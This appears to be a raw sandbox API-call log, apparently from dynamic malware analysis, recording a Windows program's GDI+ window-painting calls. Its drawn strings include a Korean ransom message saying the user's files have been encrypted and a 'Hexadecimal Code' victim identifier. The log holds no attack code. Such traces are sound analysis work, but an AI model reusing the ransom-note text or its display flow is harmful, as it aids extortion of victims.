GetWindowTextW (in: hWnd=0x102dc, lpString=0x11fe6c4, nMaxCount=33 | out: lpString="Hexadecimal Code: FB 69FA 9979\r\n") returned 32 [0169.399] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xd, wParam=0x21, lParam=0x11fe6c4) returned 0x20 [0169.399] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe670) returned 0x0 [0169.399] GetCurrentObject (hdc=0x61010800, type=0x1) returned 0xb00017 [0169.399] GetCurrentObject (hdc=0x61010800, type=0x2) returned 0x900010 [0169.399] GetCurrentObject (hdc=0x61010800, type=0x7) returned 0xb050815 [0169.399] GetCurrentObject (hdc=0x61010800, type=0x6) returned 0x8a01c2 [0169.399] SaveDC (hdc=0x61010800) returned 1 [0169.399] GetNearestColor (hdc=0x61010800, color=0xffffff) returned 0xffffff [0169.399] RestoreDC (hdc=0x61010800, nSavedDC=-1) returned 1 [0169.400] GdipReleaseDC (graphics=0x6e19d80, hdc=0x61010800) returned 0x0 [0169.400] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0169.400] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0169.400] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe610) returned 0x0 [0169.400] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5fc) returned 0x0 [0169.400] GetCurrentObject (hdc=0x61010800, type=0x1) returned 0xb00017 [0169.400] GetCurrentObject (hdc=0x61010800, type=0x2) returned 0x900010 [0169.401] GetCurrentObject (hdc=0x61010800, type=0x7) returned 0xb050815 [0169.401] GetCurrentObject (hdc=0x61010800, type=0x6) returned 0x8a01c2 [0169.401] SaveDC (hdc=0x61010800) returned 1 [0169.401] GetTextAlign (hdc=0x61010800) returned 0x0 [0169.401] GetTextColor (hdc=0x61010800) returned 0x0 [0169.401] SetTextColor (hdc=0x61010800, color=0xffffff) returned 0x0 [0169.401] GetCurrentObject (hdc=0x61010800, type=0x6) returned 0x8a01c2 [0169.401] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0169.401] SelectObject (hdc=0x61010800, h=0xa0a07ef) returned 0x8a01c2 [0169.401] GetBkMode (hdc=0x61010800) returned 2 [0169.401] SetBkMode (hdc=0x61010800, mode=1) returned 2 [0169.402] DrawTextExW (in: hdc=0x61010800, lpchText="Hexadecimal Code: FB 69FA 9979\r\n", cchText=32, lprc=0x11fe590, format=0x0, lpdtp=0x33465c8 | out: lpchText="Hexadecimal Code: FB 69FA 9979\r\n", lprc=0x11fe590) returned 48 [0169.402] RestoreDC (hdc=0x61010800, nSavedDC=-1) returned 1 [0169.402] GdipReleaseDC (graphics=0x6e19d80, hdc=0x61010800) returned 0x0 [0169.402] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7ac) returned 0x0 [0169.402] BitBlt (hdc=0x10105d6, x=0, y=0, cx=301, cy=24, hdcSrc=0x61010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.403] GdipReleaseDC (graphics=0x6e19d80, hdc=0x61010800) returned 0x0 [0169.403] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.403] SelectObject (hdc=0x61010800, h=0x85000f) returned 0xb050815 [0169.403] DeleteDC (hdc=0x61010800) returned 1 [0169.403] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.403] EndPaint (hWnd=0x102dc, lpPaint=0x11fe750) returned 1 [0169.403] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.404] IsWindowUnicode (hWnd=0x102de) returned 1 [0169.404] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.404] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.404] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.404] BeginPaint (in: hWnd=0x102de, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0x10105d6 [0169.404] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.404] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.404] CreateCompatibleDC (hdc=0x10105d6) returned 0x64010800 [0169.405] GetObjectType (h=0x10105d6) returned 0x3 [0169.405] CreateCompatibleBitmap (hdc=0x10105d6, cx=1, cy=1) returned 0x4e050816 [0169.405] GetDIBits (in: hdc=0x10105d6, hbm=0x4e050816, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.405] GetDIBits (in: hdc=0x10105d6, hbm=0x4e050816, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.405] DeleteObject (ho=0x4e050816) returned 1 [0169.405] CreateDIBSection (in: hdc=0x10105d6, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x37050812 [0169.406] SelectObject (hdc=0x64010800, h=0x37050812) returned 0x85000f [0169.406] GdipCreateFromHDC (hdc=0x64010800, graphics=0x11fe768) returned 0x0 [0169.406] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.407] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=535, height=191, combineMode=0x0) returned 0x0 [0169.407] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0169.407] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.407] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe808) returned 0x0 [0169.407] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.407] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0169.407] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.407] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.407] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0169.407] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.407] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7fc) returned 0x0 [0169.407] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe828) returned 0x0 [0169.407] GetWindowTextLengthW (hWnd=0x102de) returned 0 [0169.407] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.407] GetSystemMetrics (nIndex=42) returned 0 [0169.407] GetWindowTextW (in: hWnd=0x102de, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.407] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.408] GetClientRect (in: hWnd=0x102de, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0169.408] GdipCreateRegion (region=0x11fe644) returned 0x0 [0169.408] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.408] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0169.408] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.408] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe65c) returned 0x0 [0169.408] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.408] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ae8) returned 0x0 [0169.408] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.408] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.408] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.408] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ea0) returned 0x0 [0169.408] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.408] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.408] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe684) returned 0x0 [0169.409] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe674) returned 0x0 [0169.409] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe674) returned 0x0 [0169.409] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.409] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe68c) returned 0x0 [0169.409] GetCurrentObject (hdc=0x64010800, type=0x1) returned 0xb00017 [0169.409] GetCurrentObject (hdc=0x64010800, type=0x2) returned 0x900010 [0169.409] GetCurrentObject (hdc=0x64010800, type=0x7) returned 0x37050812 [0169.409] GetCurrentObject (hdc=0x64010800, type=0x6) returned 0x8a01c2 [0169.409] SaveDC (hdc=0x64010800) returned 1 [0169.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1704081c [0169.409] GetClipRgn (hdc=0x64010800, hrgn=0x1704081c) returned 0 [0169.409] SelectClipRgn (hdc=0x64010800, hrgn=0x29040825) returned 2 [0169.409] DeleteObject (ho=0x1704081c) returned 1 [0169.409] DeleteObject (ho=0x29040825) returned 1 [0169.410] OffsetViewportOrgEx (in: hdc=0x64010800, x=0, y=0, lppt=0x3347980 | out: lppt=0x3347980) returned 1 [0169.410] GetNearestColor (hdc=0x64010800, color=0x0) returned 0x0 [0169.410] CreateSolidBrush (color=0x0) returned 0x1d100826 [0169.410] FillRect (hDC=0x64010800, lprc=0x11fe690, hbr=0x1d100826) returned 1 [0169.417] DeleteObject (ho=0x1d100826) returned 1 [0169.418] RestoreDC (hdc=0x64010800, nSavedDC=-1) returned 1 [0169.418] GdipReleaseDC (graphics=0x6e19d80, hdc=0x64010800) returned 0x0 [0169.418] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd970dbd) returned 0x0 [0169.418] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.418] GetWindowTextLengthW (hWnd=0x102de) returned 0 [0169.418] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.418] GetSystemMetrics (nIndex=42) returned 0 [0169.418] GetWindowTextW (in: hWnd=0x102de, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.418] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.418] GdipGetImageWidth (image=0x6e18c80, width=0x11fe6c4) returned 0x0 [0169.418] GdipGetImageHeight (image=0x6e18c80, height=0x11fe6c4) returned 0x0 [0169.418] GdipDrawImageRectI (graphics=0x6e19d80, image=0x6e18c80, x=0, y=0, width=622, height=174) returned 0x0 [0169.433] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7e8) returned 0x0 [0169.433] BitBlt (hdc=0x10105d6, x=0, y=0, cx=535, cy=191, hdcSrc=0x64010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.434] GdipReleaseDC (graphics=0x6e19d80, hdc=0x64010800) returned 0x0 [0169.434] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.435] SelectObject (hdc=0x64010800, h=0x85000f) returned 0x37050812 [0169.435] DeleteDC (hdc=0x64010800) returned 1 [0169.435] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.435] DeleteObject (ho=0x37050812) returned 1 [0169.602] EndPaint (hWnd=0x102de, lpPaint=0x11fe78c) returned 1 [0169.602] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.602] IsWindowUnicode (hWnd=0x102e0) returned 1 [0169.602] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.602] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.603] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.603] BeginPaint (in: hWnd=0x102e0, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0169.603] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.604] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.604] CreateCompatibleDC (hdc=0x10105d6) returned 0x52010816 [0169.604] SelectObject (hdc=0x52010816, h=0xb050815) returned 0x85000f [0169.604] GdipCreateFromHDC (hdc=0x52010816, graphics=0x11fe76c) returned 0x0 [0169.604] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.604] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=369, height=29, combineMode=0x0) returned 0x0 [0169.604] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0169.604] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.605] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7cc) returned 0x0 [0169.605] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.605] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0169.605] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.605] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.605] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0169.605] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.605] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7c0) returned 0x0 [0169.605] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7ec) returned 0x0 [0169.605] GetWindowTextLengthW (hWnd=0x102e0) returned 24 [0169.605] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0169.605] GetSystemMetrics (nIndex=42) returned 0 [0169.605] GetWindowTextW (in: hWnd=0x102e0, lpString=0x11fe6d4, nMaxCount=25 | out: lpString="oops! 당신의 파일이 암호화 되었습니다!") returned 24 [0169.606] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xd, wParam=0x19, lParam=0x11fe6d4) returned 0x18 [0169.606] GetClientRect (in: hWnd=0x102e0, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0169.606] GdipCreateRegion (region=0x11fe608) returned 0x0 [0169.606] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.606] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0169.606] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.606] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe620) returned 0x0 [0169.606] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.606] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ea0) returned 0x0 [0169.606] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.606] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.606] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.606] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593c38) returned 0x0 [0169.606] LocalFree (hMem=0x1593c38) returned 0x0 [0169.606] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.606] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe648) returned 0x0 [0169.606] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe638) returned 0x0 [0169.607] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe638) returned 0x0 [0169.607] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.607] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe650) returned 0x0 [0169.607] GetCurrentObject (hdc=0x52010816, type=0x1) returned 0xb00017 [0169.607] GetCurrentObject (hdc=0x52010816, type=0x2) returned 0x900010 [0169.607] GetCurrentObject (hdc=0x52010816, type=0x7) returned 0xb050815 [0169.607] GetCurrentObject (hdc=0x52010816, type=0x6) returned 0x8a01c2 [0169.607] SaveDC (hdc=0x52010816) returned 1 [0169.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2a040825 [0169.607] GetClipRgn (hdc=0x52010816, hrgn=0x2a040825) returned 0 [0169.607] SelectClipRgn (hdc=0x52010816, hrgn=0x1804081c) returned 2 [0169.607] DeleteObject (ho=0x2a040825) returned 1 [0169.608] DeleteObject (ho=0x1804081c) returned 1 [0169.608] OffsetViewportOrgEx (in: hdc=0x52010816, x=0, y=0, lppt=0x3347e24 | out: lppt=0x3347e24) returned 1 [0169.608] GetNearestColor (hdc=0x52010816, color=0xffffff) returned 0xffffff [0169.608] CreateSolidBrush (color=0xffffff) returned 0x1e100826 [0169.608] FillRect (hDC=0x52010816, lprc=0x11fe654, hbr=0x1e100826) returned 1 [0169.608] DeleteObject (ho=0x1e100826) returned 1 [0169.608] RestoreDC (hdc=0x52010816, nSavedDC=-1) returned 1 [0169.608] GdipReleaseDC (graphics=0x6e19d80, hdc=0x52010816) returned 0x0 [0169.608] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd950dbd) returned 0x0 [0169.608] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.608] GetWindowTextLengthW (hWnd=0x102e0) returned 24 [0169.608] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0169.608] GetSystemMetrics (nIndex=42) returned 0 [0169.608] GetWindowTextW (in: hWnd=0x102e0, lpString=0x11fe6d4, nMaxCount=25 | out: lpString="oops! 당신의 파일이 암호화 되었습니다!") returned 24 [0169.608] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xd, wParam=0x19, lParam=0x11fe6d4) returned 0x18 [0169.609] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe670) returned 0x0 [0169.609] GetCurrentObject (hdc=0x52010816, type=0x1) returned 0xb00017 [0169.609] GetCurrentObject (hdc=0x52010816, type=0x2) returned 0x900010 [0169.609] GetCurrentObject (hdc=0x52010816, type=0x7) returned 0xb050815 [0169.609] GetCurrentObject (hdc=0x52010816, type=0x6) returned 0x8a01c2 [0169.609] SaveDC (hdc=0x52010816) returned 1 [0169.609] GetNearestColor (hdc=0x52010816, color=0x0) returned 0x0 [0169.609] RestoreDC (hdc=0x52010816, nSavedDC=-1) returned 1 [0169.609] GdipReleaseDC (graphics=0x6e19d80, hdc=0x52010816) returned 0x0 [0169.610] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0169.610] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0169.610] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe610) returned 0x0 [0169.610] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5fc) returned 0x0 [0169.610] GetCurrentObject (hdc=0x52010816, type=0x1) returned 0xb00017 [0169.610] GetCurrentObject (hdc=0x52010816, type=0x2) returned 0x900010 [0169.610] GetCurrentObject (hdc=0x52010816, type=0x7) returned 0xb050815 [0169.610] GetCurrentObject (hdc=0x52010816, type=0x6) returned 0x8a01c2 [0169.610] SaveDC (hdc=0x52010816) returned 1 [0169.610] GetTextAlign (hdc=0x52010816) returned 0x0 [0169.611] GetTextColor (hdc=0x52010816) returned 0x0 [0169.611] GetCurrentObject (hdc=0x52010816, type=0x6) returned 0x8a01c2 [0169.611] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0169.611] SelectObject (hdc=0x52010816, h=0x790a0536) returned 0x8a01c2 [0169.611] GetBkMode (hdc=0x52010816) returned 2 [0169.611] SetBkMode (hdc=0x52010816, mode=1) returned 2 [0169.611] DrawTextExW (in: hdc=0x52010816, lpchText="oops! 당신의 파일이 암호화 되었습니다!", cchText=24, lprc=0x11fe590, format=0x0, lpdtp=0x3348348 | out: lpchText="oops! 당신의 파일이 암호화 되었습니다!", lprc=0x11fe590) returned 29 [0169.615] RestoreDC (hdc=0x52010816, nSavedDC=-1) returned 1 [0169.615] GdipReleaseDC (graphics=0x6e19d80, hdc=0x52010816) returned 0x0 [0169.615] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7ac) returned 0x0 [0169.615] BitBlt (hdc=0x10105d6, x=0, y=0, cx=369, cy=29, hdcSrc=0x52010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.615] GdipReleaseDC (graphics=0x6e19d80, hdc=0x52010816) returned 0x0 [0169.615] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.615] SelectObject (hdc=0x52010816, h=0x85000f) returned 0xb050815 [0169.616] DeleteDC (hdc=0x52010816) returned 1 [0169.616] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.616] EndPaint (hWnd=0x102e0, lpPaint=0x11fe750) returned 1 [0169.616] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.616] IsWindowUnicode (hWnd=0x102e2) returned 1 [0169.616] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.617] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.617] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.617] BeginPaint (in: hWnd=0x102e2, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0x10105d6 [0169.617] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.617] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.617] CreateCompatibleDC (hdc=0x10105d6) returned 0x55010816 [0169.618] GetObjectType (h=0x10105d6) returned 0x3 [0169.618] CreateCompatibleBitmap (hdc=0x10105d6, cx=1, cy=1) returned 0x3b050812 [0169.618] GetDIBits (in: hdc=0x10105d6, hbm=0x3b050812, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.618] GetDIBits (in: hdc=0x10105d6, hbm=0x3b050812, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.618] DeleteObject (ho=0x3b050812) returned 1 [0169.618] CreateDIBSection (in: hdc=0x10105d6, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x67050800 [0169.618] SelectObject (hdc=0x55010816, h=0x67050800) returned 0x85000f [0169.618] GdipCreateFromHDC (hdc=0x55010816, graphics=0x11fe768) returned 0x0 [0169.619] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.619] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=138, height=174, combineMode=0x0) returned 0x0 [0169.619] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0169.619] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.619] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe808) returned 0x0 [0169.619] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.619] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0169.619] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.619] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.619] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0169.619] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.619] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7fc) returned 0x0 [0169.619] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe828) returned 0x0 [0169.619] GetWindowTextLengthW (hWnd=0x102e2) returned 0 [0169.620] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.620] GetSystemMetrics (nIndex=42) returned 0 [0169.620] GetWindowTextW (in: hWnd=0x102e2, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.620] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.620] GetClientRect (in: hWnd=0x102e2, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0169.620] GdipCreateRegion (region=0x11fe644) returned 0x0 [0169.620] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.620] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0169.620] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.620] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe65c) returned 0x0 [0169.620] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.620] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ae8) returned 0x0 [0169.620] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.620] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.620] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.620] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593c38) returned 0x0 [0169.620] LocalFree (hMem=0x1593c38) returned 0x0 [0169.621] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.621] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe684) returned 0x0 [0169.621] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe674) returned 0x0 [0169.621] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe674) returned 0x0 [0169.621] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.621] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe68c) returned 0x0 [0169.621] GetCurrentObject (hdc=0x55010816, type=0x1) returned 0xb00017 [0169.621] GetCurrentObject (hdc=0x55010816, type=0x2) returned 0x900010 [0169.621] GetCurrentObject (hdc=0x55010816, type=0x7) returned 0x67050800 [0169.621] GetCurrentObject (hdc=0x55010816, type=0x6) returned 0x8a01c2 [0169.621] SaveDC (hdc=0x55010816) returned 1 [0169.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1904081c [0169.621] GetClipRgn (hdc=0x55010816, hrgn=0x1904081c) returned 0 [0169.621] SelectClipRgn (hdc=0x55010816, hrgn=0x2c040825) returned 2 [0169.621] DeleteObject (ho=0x1904081c) returned 1 [0169.622] DeleteObject (ho=0x2c040825) returned 1 [0169.622] OffsetViewportOrgEx (in: hdc=0x55010816, x=0, y=0, lppt=0x3349700 | out: lppt=0x3349700) returned 1 [0169.622] GetNearestColor (hdc=0x55010816, color=0x0) returned 0x0 [0169.622] CreateSolidBrush (color=0x0) returned 0x1f100826 [0169.622] FillRect (hDC=0x55010816, lprc=0x11fe690, hbr=0x1f100826) returned 1 [0169.624] DeleteObject (ho=0x1f100826) returned 1 [0169.624] RestoreDC (hdc=0x55010816, nSavedDC=-1) returned 1 [0169.624] GdipReleaseDC (graphics=0x6e19d80, hdc=0x55010816) returned 0x0 [0169.624] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd930dbd) returned 0x0 [0169.624] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.624] GetWindowTextLengthW (hWnd=0x102e2) returned 0 [0169.624] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.624] GetSystemMetrics (nIndex=42) returned 0 [0169.624] GetWindowTextW (in: hWnd=0x102e2, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.624] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.624] GdipGetImageWidth 